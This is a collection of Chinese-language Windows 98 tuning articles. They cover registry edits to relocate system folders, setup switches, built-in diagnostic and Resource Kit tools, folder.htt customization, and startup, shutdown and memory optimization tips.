Windows系统下的常用文件夹默认都在系统所在分区，这样有一个缺点就是需要频繁地备份其中的文件（夹），今天我们就用注册表编辑器来更改这些常用文件夹及部分功能路径以达到减少系统盘负担的目的。

    1、改变“字体”的目录

    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Current Version\Explorer\Shell Folders 在右边窗口中更改字符串“Fonts”的数值为新的目录路径, 如 D:\abc，记住要把原目录里的文件复制到新的目录。

    友情提示：利用此方法可以让多系统共享一个字库，节省不少空间吧！

    2、改变“发送到”的目录

    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 在右边窗口中更改字符串“SendTo”的键值为新的目录路径, 如 D:\abc。

    友情提示：“发送到”命令可以说是一个绝对好使的邮差，利用它可以方便地复制文件。

    3、更改“网页的历史记录”目录

    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 在右边窗口中更改字符串“History”的数值为新的目录路径, 如 D:\abc

    4、更改“我的文档”目录

    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 在右边窗口中更改字符串“Personal”的数值为新的目录路径, 如 D:\abc

    5、更改IE的缓冲的路径

    在 HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 下更改“Cache”的路径即可。

    6、改变收藏夹的默认路径

    在HKEY_USERS\.DEFAULT\Software\Microsoft\Windows CurrentVersion\Explorer\User Shell Folders下找到字符串值“Favorites”，并设其值为你想要的下载路径,如D:\Favorites。

    7、改变默认安装的路径

    展开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion，在右侧窗口找到ProgramFilesDir，就是它记录了Program Files的路径，双击把它的数值“C:\Program Files”修改成你需要的目录如“D:\Soft”，确定退出就可以了。

    友情提示：此办法并不是对所有的安装程序都适用。

    8、改变默认下载的路径

    在HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer下在右边的窗口中新建DWORD值“Download Directory”，并设其值为你想要的下载路径，如D:\My Download。

4.加速度安装 WINDOWS98

通常，安装Windows只需键入Setup后按回车即可。殊不知Setup后面还可以跟不少参数，灵活加以运用，可以加快安装速度。

    /t：d：\tempd：\temp为Windows 98安装过程中生成的临时文件的存放路径。请把临时路径指到非安装盘，这样不仅使安装速度更快，还使得安装盘的文件碎片大大减少，安装完后不需要再作磁盘整理。

    /is安装前不用Scandisk扫描硬盘。在新硬盘或刚格式化过的硬盘上可用此参数。

    /ie不创建应急软盘。

    /iv跳过Windows 98安装过程中出现的公告（介绍Windows 98新特性的文字和图文），以节省安装时间。

    /im跳过内存的检查。新机器不要采用此参数，不然Windows 98会经常出问题。


Windows 98的秘密武器（二）

《一键清理系统垃圾》

Windows 98的秘密武器（二）

    网络工具
    Windows98除了内置IE、Outlook Express、超级终端等网络软件之外，内部还有几个测试服务器、路由器等设备的网络工具。
    1.Ping.Exe
    Ping位于Windows 98安装目录内。运行Ping后，它会送出一帧32位的数据到ISP的服务器。然后，Ping会记录服务器响应的时间。如果屏幕上显示的四个时间均超过400ms，而你使用的又是33.6K或56K的MODEM，那就说明该ISP的线路过分拥挤或服务器严重超载。因此，Ping的测试结果可以作为你选择ISP的一个依据。
    Ping的使用方法是：运行Windows 98并确认MODEM能够与ISP的主机正常连接，然后打开“开始”菜单，选择“运行”命令。在“运行”框中输入“Ping□ISP主机地址或名称”（其中“□”代表空格，下同），如ping□200.101.65.122或ping□www.abc.net，单击“确定”按钮。稍等片刻就会在“Ping”窗口中显示出4次测试的结果。假如有一两次大于300ms的结果，是正常的。如果出现“Request timed out”提示，那表示ISP的服务器在1秒之内没有响应。遇到这种情况，一种可能是该服务器已设定为不响应Ping，另一种可能是网络的连接速度太慢。
    2.Tracert.Exe
    Tracert也在Windows 98安装目录中。它能够检查你上网时数据到达目的主机过程中的传输路径，可以知道数据传输过程中是否存在路由器瓶颈。
    Tracert使用方法是：在“运行”框中输入“Tracert□你的ISP主机地址或名称”（如Tracert□200.101.65.122或Tracert□www.xyz.net），单击“确定”。Tracert最多会显示30个到达主机前经历的路由器清单，同时会显示到达每个路由器的时间（如^47020201a^）。假如你不想查看Tracert所显示出的信息，或是屏幕上显示目前被挡在某个路由器上，而且不断出现“Request timed out”的提示信息，可按下“Ctrl＋C”键退出。要是看到4次“Request timed out”信息，可能是遇到了Tracert不能查询的路由器，可关闭窗口退出。
    3.Winipcfg.Exe
    Winipcfg是Windows 98安装目录下的一个小程序，它能获得有关本机IP协议的配置属性，如IP地址、网关、子网掩码等。
    Winipcfg使用方法是：在“运行”框中输入“Winipcfg”，单击“确定”即可打开窗口。如果你要获得有关IP配置的所有信息，单击窗口中的“详细信息”按钮，即可看到有关“主机信息”、“Ethernet适配器信息”等内容。另外，Winipcfg还有一个“妹妹”Ipconfig，它只能在DOS环境下运行。
    系统工具
    这是Windows内置工具的一个大家族，其中的多数大家都用过，但“知人知面不知心”者居多。
    1.Fontreg.Exe
    称为字体注册程序。如果Windows 98目录的Font文件夹中存在某种字体，却在Word 2000等软件中找不到，多数是字体没有被系统注册的缘故。你只须单击“开始”菜单中的“运行”命令，在“运行”对话框中输入“fontreg”，单击“确定”按钮运行fontreg注册字体即可。
    2.Internat.Exe
    Windows 98输入法切换程序。它通过注册表的“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”分支加载，如果它在系统启动时没有运行，那么Windows 98的系统时钟区就看不到输入法切换按钮。此时你只要在Run分支下重建名称为“internat.exe”的数据“internat.exe”，然后重新启动系统即可。通过“运行”对话框或“程序”、“启动”菜单执行internat.exe也有相同效果。
    3.Sysedit.Exe
    专门用于Autoexec.bat、Config.sys、System.ini、Win.ini及Protocol.ini 5个系统文件的编辑器。虽然它的部分功能与Msconfig.exe重复，使Sysedit显得有些多余，但它的多窗口查看方式用起来非常方便。
    4.Control.Exe
    “控制面板”项目调用程序。在“运行”中不带参数执行可打开“控制面板”，若以“Control desk.cpl□，数字代码”执行可打开某个控制面板项目，例如运行“Control desk.cpl□，3”将打开“显示属性”、“设置”选项卡。用户可以利用这一特性快速打开某些系统设置项目。
    5.Fontview.Exe
    它是字体文件的默认关联程序。除了按通常方法查看字体外，如果在“运行”对话框中以“Fontview□字体文件名.TTF”的格式运行，可以直接打开窗口查看字体。
    6.Ieshwiz.Exe
    自定义文件夹向导。在“运行”对话框中输入“Ieshwiz”运行，可以直接打开“自定义文件夹向导”，与执行资源管理器“查看”菜单下的“自定义文件夹”命令效果相同。
    7.Systray.Exe
    音量控制程序。它的加载方式与Internat相同，运行后系统时钟区会出现小喇叭图标，双击后可打开对话框调整音量和音频属性。
    8.Taskman.Exe
    Win 3.x任务管理器的Windows98版。运行后可以显示所有窗口方式执行的任务，可以执行切换、关闭任务，层叠、平铺、排列窗口等操作。
    9.Winfile.Exe
    Win 3.x文件管理器的Windows98版。虽然界面显得比较陈旧，但常用功能一应俱全，喜欢怀旧和节省资源的朋友可以试一试。


Windows 98的秘密武器（三）

《一键清理系统垃圾》

Windows 98的秘密武器（三）

    常用工具
    之所以称下面的程序为常用工具，不仅因为它们内置在“系统信息”程序的“工具”菜单中，更由于大家对它们非常熟悉，故以下仅作简单介绍。
    1.Msconfig.Exe
    Msconfig称为“系统配置实用程序”，位于Windows 98安装目录下的System文件夹里。Msconfig除了可以查看和编辑系统文件（Config.sys、Autoexec.bat、System.ini和Win.ini）以外，进行系统故障诊断是它的主要用途。例如，为了判断哪些模块或程序导致了系统故障，你可以逐个清除“启动”选项卡程序名前面的复选标记，以禁止它们在启动时加载，通过逐项排除来确定导致故障的原因。还可以单击“常规”选项卡中的“高级”按钮，打开“高级疑难设置”对话框。选中其中的一个或几个选项，让有可能引起故障的系统特性失效，从而判断由系统特性引发的故障。
    2.Scanregw.Exe（Scanreg.Exe）
    这是Windows 98提供的“注册表检查与恢复程序”。其中Scanregw通过注册表加载，能在每天第一次开机时备份注册表，并检查它是否存在明显错误。一旦注册表发生无法自动恢复的故障，可以利用启动盘将系统引导至纯DOS环境，在Windows 98安装目录下输入命令Scanreg敲回车，在几个不同日期的注册表备份中选择恢复目标，即可完成注册表的恢复。
    3.Vcmui.Exe
    Vcmui称为“版本冲突管理器”。Windows 98能在安装程序时备份被替换掉的系统共享文件，如果由于新安装的文件引发了故障，可在Vcmui窗口中选中该文件，然后单击窗口下面的“恢复所选文件”即可将备份的文件恢复（“备份版本”和“现有版本”相互交换）。
    4.Asd.Exe
    Asd称为“自动跳过驱动程序代理”。由于Windows 98硬件驱动程序升级频繁，但是一些新的驱动程序没有经过充分测试，安装以后会使系统变得不太稳定。Asd可以帮助你检查系统是否存在上述问题，它会扫描系统使用的驱动程序，如果发现了问题，将会弹出一个问题说明对话框。单击其中的“详细资料”按钮，会给出关于问题细节及解决方案的资料，帮助用户消除系统存在的不稳定因素。
    5.Sfc.Exe
    Sfc称为“系统文件检查器”，它能帮助用户检查系统文件的完整性。Sfc运行后的窗口中有两个选项：选中“扫描改动过的文件”项，单击“开始”，Sfc将检查系统文件的完整性。如果发现文件损坏，就会出现“文件已损坏”对话框，建议用户从安装盘中还原文件。如果系统没有问题但有文件被更新，则Sfc会将有关资料更新（是否自动更新可由用户设置），并作为下一次扫描的依据。单击窗口中的“设置”按钮，将会打开“系统文件检查器设置”对话框，供你对Sfc的一些工作方式进行设置（例如是否自动更新扫描资料、文件备份方式等）。
    6.Dr Watson.Exe
    Dr Watson用于提供系统故障发生的现场报告，它的使用方法是：运行Dr Watson使其驻留内存。一旦发生“一般性保护错误”等故障，可以用鼠标单击系统时钟区的Dr Watson图标，选择快捷菜单中的“Dr Watson”命令，窗口打开过程中就会自动生成故障报告。窗口的“诊断”选项卡中有问题发生时刻的系统指令资料，使用“查看”菜单下的“高级视图”，还可以进一步查看相关资料，下面的小窗口显示错误发生时的具体操作，便于用户定位故障原因。
    7.Sigverif.Exe
    称为“签字验证工具”，它的主要功能是帮助用户查找电脑上已签字和未签字的文件。它可以查看文件的数字签名，以确认文件未被篡改，还可以搜索指定位置的已签字或未签字文件。


Windows 98的秘密武器（一）

《一键清理系统垃圾》

Windows 98的秘密武器（一）

    每天一上班，两只老虎就运行Windows，然后是Foxmail、IE浏览器，还加上一个Word。Windows对老虎来说，只意味着一个“开始”按钮，根本没放在心上。直到看了下面的文章，才知道它的系统文件夹和光盘中还有许多深藏不露的文件，每个都深怀绝技，你不想了解吗？文中除特别指明的文件外，其它均可在Windows系统文件夹中找到。
    设置工具
    打开Win 98 CD上的Tools\Res Kit文件夹，运行Setup命令进行安装，“程序”菜单里就会生成一个“Windows98 Resource Kit”文件夹。执行其中的“Tools Management Console”命令打开“工具管理控制台”，其中包含了下面介绍的这些工具。你也可以在安装结束后打开Program Files\Windows 98Rk文件夹，直接运行它们。
    1.Batch 98.Exe
    安装Windows98最令人头痛的莫过于配置系统，如输入法、默认打印机、桌面等等。Batch 98可以根据你的需要制作一个安装信息文件，在给配置相同的大批电脑安装操作系统时，安装程序可根据安装信息文件自动配置系统，这给恢复或成批安装Windows98带来了极大的方便。Batch 98运行后的界面如^46020201a^1所示，它有两种安装信息文件的方式：
    首先是“收集目前注册表设置”方式，它适合按现有的系统配置进行安装的情况。你只要在图1界面中单击“现在收集”按钮，完成后单击“保存设置到INF”按钮，在“另存为”对话框中选择安装信息文件的存放位置，在“文件名”框内输入安装信息文件名，最后单击“保存”按钮即可。
    以后为本机或相同配置的其他电脑安装Windows98，只须将安装信息文件作为Setup命令的一个参数使用，格式为“Setup 路径\安装信息文件名.inf”（不带引号）。以后你要做的就是敲一下回车然后喝茶，安装信息文件会自动安装出相同配置的多个系统。
    其次是“系统设置”方式，它适合对不同配置的系统进行安装的情况。使用方法是根据需要单击图1中“系统设置”下的按钮，打开相应的对话框，先对要安装的系统内容进行配置。由于整个界面是中文的，加之使用复选项进行配置，整个操作非常简单、方便。配置完成后按上面介绍的方法生成INF文件，将它作为Setup命令的参数使用。如果你有许多不同配置的电脑，可以生成多个名称不同的安装信息文件，分别使用它们进行自动安装。
    2.CheckLinks.Exe
    CheckLinks的用途是对系统进行扫描，用来发现被破坏的文件链接（如删除文件后残留的快捷方式等）。你只要打开CheckLinks窗口，单击其中的“下一步”按钮扫描系统，如果没有发现问题，则^46020201b^2窗口中间是空白的。随后会弹出一个对话框，单击其中的“确定”按钮退出。如果系统存在被破坏的文件链接，则图2窗口中间会列出文件名和复选框，供用户选择要删除的部分或全部链接。
    3.Quick Tray.Exe
    Quick Tray可以将应用程序图标放入系统托盘，它的使用方法是：运行Quick Tray使它的图标在系统托盘显示，单击图标弹出^46020201c^3所示对话框，供你执行加入、删除、关闭等操作。向系统托盘加入应用程序的方法是：单击图3中的“Add”按钮，找到你需要的程序，选中后单击“打开”按钮。再次打开图3对话框，可看到程序名及其路径出现在窗口中。以后你只要运行了Quick Tray，则加入其中的程序图标就会出现在系统托盘，单击图标即可运行这些程序。若要删除已加入的程序图标，可在图3中将其选中，单击“Remove”按钮。要退出Quick Tray，可单击“Exit”按钮。要关闭打开的对话框（图3），可单击“Close”按钮。
    4.Tweak UI.CPL
    Tweak UI是最早出现的Windows 98内部设置工具，属于Windows 98控制面板文件，位于Windows 98CD的Tools\Res Kit\Powertoy文件夹。它的安装方法是：打开Powertoy文件夹，用鼠标右键单击其中的Tweak UI控制面板扩展文件。在快捷菜单中选择“在控制面板中打开”命令并单击，然后在对话框中给出文件路径即可完成安装。
    安装完成后，单击“控制面板”中的图标打开Tweak UI窗口（^46020201d^4）。其中有一组功能选项卡，例如“Mouse”可以设置鼠标灵敏度、滚轮鼠标的页面滚动速度；Desktop可删除桌面上的系统图标，如“网上邻居”、“回收站”等；My Computer选项卡可以隐藏“我的电脑”中的驱动器等等。
    由于“Windows优化大师”等工具的出现，眼下使用Tweak UI的用户已经很少，但它是此类工具的“鼻祖”，我们还是别忘了它。


Windows 98下巧妙隐藏硬盘一法

《一键清理系统垃圾》

Windows 98下巧妙隐藏硬盘一法

    现在有很多修改注册表的软件都可以在Windows 98下隐藏硬盘，如《超级兔子魔法设置》之类，但用这些软件隐藏硬盘时，虽然在“我的电脑”中看不见驱动器，但只要在Windows的地址栏里输入盘符就可以访问硬盘中的内容了。例如，用“超级兔子”将C盘隐藏，但在地址栏里输入“C：\”就可以进入C盘了。笔者现在向大家介绍一种利用Windows 系统的配置设置文件desktop.ini和超文本模板文件folder.htt，配合修改注册表软件巧妙隐藏硬盘的一种方法。
    众所周知，在“按Web页”查看方式下，进入Windows目录时都会弹出一句警告信息，告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件”，这时单击“显示文件”就可以进入该目录了。原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下（由于这两个文件是隐藏文件，之前必须在文件夹选项中单击“查看”选项卡，选择“显示所有文件”，这样就可以看见这两个文件了）。再按“F5”键刷新一下，看看发生了什么，是不是和进入Windows目录时一样。
    下面，用“记事本”打开folder.htt，哦，原来这是用HTML语言编写的一个文件，还等什么，赶快发挥你的想像力尽情地修改吧。如果你不懂HTML语言也没关系，先找到“显示文件”将其删除，找到“修改该文件夹的内容可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件”，将其改为自己喜欢的文字，例如“安全重地，闲杂人等请速离开”，将“要查看该文件夹的内容，请单击”改为“否则，后果自负!!!”，接着向下拖动滑块到倒数第9行，找到“（file:／／％TEMPLATEDIR％\wvlogo.gif）”这是显示警告信息时窗口右下角齿轮图片的路径，将其改为自己图片的路径，例如用“d:\tupian\tupian1.jpg”替换“//”后面的内容，记住这里必须将图片的后缀名打出，否则将显示不出图片。当然，你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果，然后只要将原文件拷贝到：
    <!－－
    ＊ This file was automatically generated by Microsoft Internet Explorer 4.0
    ＊ using the file ％THISDIRPATH％\folder.htt.
    －－>的后面，覆盖掉原文件中“<html>～<／html>”之间的内容就可以了。保存并退出，按“F5”键刷新一下，是不是很有个性?接下来要作的就是用“超级兔子”将你所要的驱动器隐藏起来，不用重新启动就可以欣赏自己的作品了而且是个双保险。最后还要告诉大家一招更绝的，那就是干脆将folder.htt原文件中“<html>～<／html>”之间的内容全部删除，这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象，使其中的文件更安全。
    （编者注：这当然算不上是一种高明的隐藏方法，因为只要打开该驱动器，在窗口右边单击鼠标右键选择“查看”，在菜单中选择除“按Web页”的任何一种查看方式就可以看到驱动器中的内容了。但这里主要是介绍了folder.htt这个特殊的文件，希望能抛砖引玉，利用这个文件将你的系统装扮得更有个性。）


给Win98装上“飞毛腿”

《一键清理系统垃圾》

给Win98装上“飞毛腿”

2001-09-11· ·黄鑫··yesky

    相信已经有不少朋友装了Win98第二版(Second Edition)，我经过一段时期摸索，发现了一些使Win98启动速度加快、运行更稳定的技巧，今拿出来大家共同分享：

    1.不要在开机时载入太多不必要的常驻程式。（可在“开始-程序-附件-系统工具-系统信息”中的工具栏内选中“系统配置使用程序”中的“Win.ini”和“启动”中关掉不必要的长驻程序，“System.ini”中的任何东西都不要乱动，除非你想让Win98少胳膊少腿，切记切记！

    2.Autoexec.bat和Config.sys中什么也不要写。

    3.将硬盘由FAT16转为FAT32。

    4.不要使用ActiveDesktop,否则系统运行速度会因此减慢（右击屏幕→寻显示器属性”→Web标签→将其中关于“活动桌面”和“频道”的选项全部取消），也不要用以Gif做为动态壁纸。

    5.选择“开始→程序→附件→系统工具→系统信息→系统信息对话框”，然后，选择“工具→系统配置实用程序→System.ini”，点选Vcache，新建Maximum=xxxx，再新建Minimum=xxxx，xxxx处请依照内存大小换算后填入，公式为：内存数×256（2的8次方），如32M内存则填写如下：

    [Vcache]
    Maximum=8192
    Minimum=8192
    注意：xxxx≤12288。

    6.自己设定虚拟内存为机器内存的25倍，例如：有32M的内存就设虚拟内存为80M，且最大值和最小值都一样（此设定可通过“控制面板→系统→性能→虚拟内存”来设置）。

    7.到控制面板中，选择“系统→性能→文件系统”：

    a.将硬盘标签的“计算机主要用途”改为网络服务器，“预读式优化”调到全速。

    b.将“软盘”标签中“每次启动就搜寻新的软驱”取消。

    c.CD－ROM中的“追加高速缓存”调至最大，访问方式选四倍速或更快的CD－ROM。

    8.定期使用下列工具：磁盘扫描、磁盘清理、碎片整理、系统文件检查器（ASD）、Dr.Watson等。

    本人的配置如下：AMD Athlon 1.2G,Soltek-75drv,256M DDR,Seagate Barracuda III 30G.我的机器由以上处理后，已经感受到了系统的稳定和快速，实验后发现从启动计算机到完全进入Win98只需要27秒。
系统优化全集

2002-01-30· ·李建华··Yesky

1 2 3 4　下一页

    计算机经过一段时间的运行之后，我们就会感觉到运行速度越来越慢、性能也逐渐下降，甚至到了打开一个窗口也要等半天才能完全显示出来的地步。此外，即使配置完全相同的两台计算机，在运行速度上也会有相当大的差异。这是什么原因呢？应该如何处理呢？这其实就是系统优化应当回答并解决的问题。
    通常情况下，CPU的主频越高，内存的容量越大、频率越高，硬盘的剩余空间越多、读写速度越快，计算机的性能就也越高。因此对系统进行优化时，必须在这些方面下功夫。当然影响计算机性能的还有显卡频率的高低、显存和主板缓存的大小、外围设备的多寡等因素，为了降低本文的复杂程序，这里我们就不作细致的讨论。

一、选择合适的操作系统及应用软件

    软件是体现硬件价值的唯一尺度。每一个时期出现的软件，都是和那个时期的基本硬件配置相适应的。一台机器的整合性能就要看它和软件搭配的程度。因此，高档的P4配上DOS和低档的486配上Win xp作为整个PC系统来讲都是毫无价值的。虽然硬件都具有可调节性(这就是超频的先决条件，也就是硬件优化)，但是可调节程度是有限的。此外，硬件的超频一般都采用整体超频(提高FSB)，而每个硬件的可调节程度是不同的，所以方法较复杂且危险性较大，不适合初学者。还有，有些硬件如显卡的芯片时钟、显存时钟是不可能用硬件方法来调节的。所以可以这样说：软件的优化是建立在硬件的基础上的，你别指望你的MMX机器优化后比P4还跑得快。但如果你的P4机器搭配不当、资源分配不合理（如只配32M内存），则有可能会比MMX还慢。因此，配置机器时最好能让各个部件性能均衡，尽量消除木桶效应。配置完全相同的计算机安装不同的操作系统及应用软件，在运行速度上也会表现出较大的差异。如在MMX 233/64M的机器上安装Win 98就会比Win xp快，但如果在P4 1.4G/256M上安装Win xp则会比Win 98快得多，也稳定得多。因此，不同配置的计算机搭配不同的操作系统及应用软件就成为系统优化的前提。下面我们就首先来探讨一下：何种配置的计算机该安装什么样的软件才能最大地发挥计算机的潜力?

二、低端配置

    1.硬件环境

    CPU：133MHZ——350MHZ
    内存：32M——64M
    硬盘主分区剩余空间（以下称剩余空间）：400MB——800MB

系统优化全集

2002-01-30· ·李建华··Yesky

上一页　1 2 3 4　下一页

    2.推荐安装的操作系统及应用软件
    ●操作系统——Win 98SE

    Win 98SE是Win 98的补丁升级版，相对于Win 98修正了许多BUG，同时也更新了众多Windows组件，增加了大量的驱动程序，增强了网络功能，其稳定性也有了不小的提高。重要的是Win 98SE对硬件的要求比较低，在低端配置的机器上基本能流畅运行。

    ●浏览器——IE 5.0＋Fantasia Web Explorer

    不管微软将自己的IE浏览捆绑在Windows中的做法是否合理，但终究受益的都是我们普通用户。IE最值得称道的是将Web浏览与桌面紧密结合的方式，使我们管理和使用计算机时就像是在浏览网页，非常方便。不过由于IE是属于单进进程浏览器——每打开一个新页面就会启动一个IE窗口，所以占用的系统资源是相当可观的，对于小内存用户来讲可能会导致资源不足而引起系统崩溃。好在IE是开放的，任何软件开发者都可以利用它集成于系统中的控件来开发出兼容于IE，但功能更为强大的浏览器。

    Fantasia Web Explorer是一款IE外挂式浏览器，它采用分页式浏览界面，无论打开多少个页面，都在一个窗口中进行。作者称用Fantasia打开20个页面和IE同时打开3个页面所占用的系统资源相同，这对于那些上网就像打仗的朋友来说是相当有诱惑力的。在使用IE时经常会发生由于某个页面出现非法错误，关闭该错误提示窗口后将关闭所有IE窗口的情况。Fantasia对此采用了内部保护措施，屏蔽掉该错误提示，大大增强了IE的稳定性。此外，Fantasia的搜索功能也非常强大，可以同时在22个中英文搜索引擎上进行搜索。通过设置，Fantasia还可以过滤掉烦人的弹出式广告窗口。此外，它还具有定时提醒、浏览记录清除、IE与Netscape收藏夹（书签）相互转换的功能。

    总体来说，Fantasia是一款高效率的IE外挂浏览器，值得向低配置，并且还在为网费和网速苦恼的朋友推荐。

    软件类型：免费
    文件尺寸：617KB
    下载地址：http://xiaxin.heha.net/mysoft

    ●电子邮件客户端管理程序——FoxMail 3.11

    电子邮件程序体积一般都比较小巧，但在资源占用率及启动速度上却相差很大。FoxMail属于绿色软件，系统占用率极少、运行稳定、收发邮件速度飞快、体积小巧且功能强大，对中文的支持非常优秀。尽管FoxMail已经推出了4.0测试版，但就我个人的感觉无非增加了几个不常用的功能，但在启动速度上较3.11版要慢不少，在低配置的机器上更加明显。

系统优化全集

2002-01-30· ·李建华··Yesky

上一页　1 2 3 4　下一页

    ●图像处理软件——PhotoShop 5.0
    考虑到是在小内存的机器上运行PhotoShop，所以选择了5.0版，相对于了6.0版它运行时所占用的内存比较小，在处理一般图形文件时基本上不会出现剧烈读盘现象。如果机器的内存非常小（小于64M），则可以按下面的设置来提高PhotoShop可用的内存量。

    在Windows里，PhotoShop可用的缺省内存量为当前系统可用量的50％，如果计算机的内存非常小，应在“File（文件）”→“Preferences（预置）”→“Memory & Image Cache（内存与图像高速缓存）”菜单项中提高比例。注意，不要将该比例超过90％，否则极易由于资源不足而造成死机。

三、高（中）端配置

    1.硬件环境

    CPU：600MHZ（400——600MHZ）以上
    内存：256M（128——256M）以上
    剩余空间：5G（2G）以上

    2.推荐安装的操作系统及应用软件

    ●操作系统——Win 2000 Professional

    Win 95相对于Win 3.x无疑是一次质的飞跃，而Win 98相对于Win 95只不过是一次小小的版本更迭，因为两者无论在本质上还是在性能上几乎没有明显的差异。至于Win me，无论是在本质上还是性能上都没有可圈可点之处，甚至某些方面还不如Win 98，那么Win 2000与Win 98相比有哪些重要的改变呢？

    ①系统更稳定

    Win 2000采用了一系列先进的技术，基本上杜绝了死机和蓝屏现象，完全可满足7×24（每周工作7天，每天工作24小时）的苛刻要求。

    ②运行效率更高

    Win 2000支持多达4GB的内存和多处理器（Win 98不支持），因此，系统的处理速度更快，更适宜于从事复杂的运算工作。另外，Win 9x为了兼容32位和16位应用程序，在很大程序上牺牲了运行效率。而Win 2000放弃了对16位应用程序的兼容，因此，运行速度和处理能力都明显提升。网上有测试表明，在配置了128M或更多内存的计算机上，Win 2000运行最流行的商业软件的速度比Win 95快32％，比Win 98快27％。

系统优化全集

2002-01-30· ·李建华··Yesky

上一页　1 2 3 4

    ③系统更安全

    由于我们普通用户对安全性的要求不是太高，这里只简要地作个介绍。Win 2000提供了用户验证、文件数据加密存储、文件传输过程中对数据进行加密、廉价的远程通讯解决方案等重要功能。
    不过Win 2000对游戏的支持差强人意，如果你的电脑主要是为了玩游戏或者运行16位应用程序，那还是用Win 98好一些。如果你想让计算机工作时具有高效率、高稳定性和高安全性，而娱乐时又想具有完美的游戏支持，可以考虑让Win 98与Win 2000双启动。另外，最新推出的Win xp对游戏的支持也非常良好，可以考虑到升级到Win xp。

    浏览器——IE5.5

    目前，IE已经推出了最新的6.0版（已经捆绑在Win xp中），从使用过程来看，它在很多方面都做了改进，特别是Internet集成方面。不过如果你的工作不是研究新软件，那么强烈推荐你用IE5.5，因为通常集成在操作系统中的浏览器是最稳定的，如果没有特殊要求最好不要升级。

    ●电子邮件客户端管理程序——Outlook Express 5.5

    微软已经将OE集成在Win 2000中且无法卸载，所以很多人为了图方便干脆使用OE作为自己的邮件客户端管理程序。当然，选择的原因也因为微软的产品一向以简洁和方便著称于世。同时，它对中文的支持也非常好，因为OE是和IE共用字体的，因此可以随时调整内码的结构。另外，它还具有相当强大的远程邮箱管理功能。

    至于其它的软件就凭各位的爱好了，不过尽量遵循以下原则：能用低版本软件时尽量用低版本软件，除非该软件实在满足不了你的要求，再考虑升级。因为软件升级带来更多功能的同时也带来了更多的BUG，同时软件的体积也会增加、对硬件的要求也会更高，从而导致计算机运行速度更慢。另外，合理分区硬盘与使用硬盘也是相当重要的，尽量将应用程序和游戏安装在系统以外的分区（如D:盘）、将重要的数据保存在硬盘的最后一个分区，因为这样即使硬盘遭到破坏也有可能将数据恢复回来，呵呵！扯远了。

    现在你已经确定了应该安装哪种操作系统及应用软件，下面我们分别对Win 98/me和Windows 2000进行全面的优化，让它们运行得更快速。


关于98的优化

《一键清理系统垃圾》

关于98的优化

一， 去掉DOS系统配置文件

    其中，autoexec.bat与config.sys是DOS时代的两个系统配置文件，在Windows 98则是可有可无，而且如果你不需要在纯DOS下做必要的工作，那么这两个文件可以不要，这样可加快系统的启动，减少资源占用率。

加快系统启动速度

    1、用系统配置程序定制自动选项。

    单击“开始”按钮，选择“运行”，在“打开”输入框内输入msconfig，单击“确定”按钮启动系统配置实用程序，单击“常规”标签项，选定“选择性启动”单选框，在此单选框内只选定“处理System.ini文件”和“处理Win.ini文件”这两个复选框。单击“启动”标签项，这个方框内只选择“ScanRegistry C:\Windows\scanregw.exe /autorun”和需要进行实时监控的防病毒程序等。

    2、删除一些自动加载的程序。

    Windows98在启动时会自动加载一些程序，随着Windows下安装的程序的增多，特别是一些程序在Windows启动时也跟着运行，影响了Windows系统的运行速度。因此我们可以合理地配置这些启动程序，删除一部份不必要自动加载的程序。

    “启动”组中的程序可以通过在“启动”组中指到要删除的启动项，点击鼠标右键进行删除。

    注册表中的自动加载程序，可以通过修改注册表来删除。运行注册表编辑器Regedit，点击并展开HKEY_LOCAL_MACHINE\MICROSOFT\Windows\CURRENTVERSION\Run，选中右边窗口中的Windows初始化后自动加载程序，将它删除；点击并展开HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CURRENTVERSION\RunServices，选中右边窗口中的Windows启动时自动加载程序，将它删除。

    3、取消系统启动系列中的时间延时

    打开“资源管理器”→“编辑”→“文件夹项”→“属性”→设为查看所有文件，退出，在Windows 98启动盘根目录下找到Msdos.sys，在这个文件上右键单击它，并从弹出菜单中选取“属性”项，去掉“只读”和“隐藏”属性，然后单击确定，再用Notepad打开Msdos.sys，在[Options]下，输入一行Boot Delay=0(表示延时0秒)，关闭记事本并保存所做修改，恢复其“隐藏”和“只读”属性，退出并重新启动Windows。

二、加快系统关机速度

    可能我们已经感受到Windows的关机要等很上几分钟甚至关不了机，怎么办呢？通过以下办法可以解决。

    编辑注册表，在\HKEY_LOCAL_MACHINE\System\Courrent-ControlSet\Control\Shutdown 下创建一个名为 FastReboot 的字符串键，键值为1即可。也可以通过运行Windows实用配置文件msconfig，或是通过点击“开始” →“程序” →附件→系统工具→系统信息，选择工具菜单中的“系统配置实用程序”，点击“高级”按钮，选中“如果关机失败，请禁用磁盘扫描程序”，并不选中“禁用快速关机”即可。

  三、对内存进行优化

    内存是决定系统运行速度的其中一个重要因素，当内存一定的情况下如何减少内存的不必要占用率呢?有很多方法，右击“我的电脑”，打开“属性”→“性能”→“文件系统”→“CD-ROM”，拖动“追加的高速缓存大小”游标至“小”，将“最佳访问方式”设置为“倍速”，这样的设置对现在包含Cache的高速光驱来说影响不大，在不太需要光驱的情况下可以让出更多的内存空间。还有就是减少虚拟磁盘，通过修改System.ini文件中的[vcache]小节，将“MaxFileCache=”后的数值设置一个适当的数（单位为KB）。还有就是一个软件，名叫MagnaRAM97的，可以压缩内存的数据，也就是说你的内存将可以同时处理更多的东西。比起虚拟内存的速度快多了。当然，现在内存比较便宜，多加些就可以解决问题了。

四、进行硬盘碎片整理

    将硬盘格式从FAT16转换为 FAT32，然后通过“系统工具” →“维护向导”安排定期的硬盘碎片整理。也可以使用一些专门的磁盘碎片整理工具完成碎片整理工作。

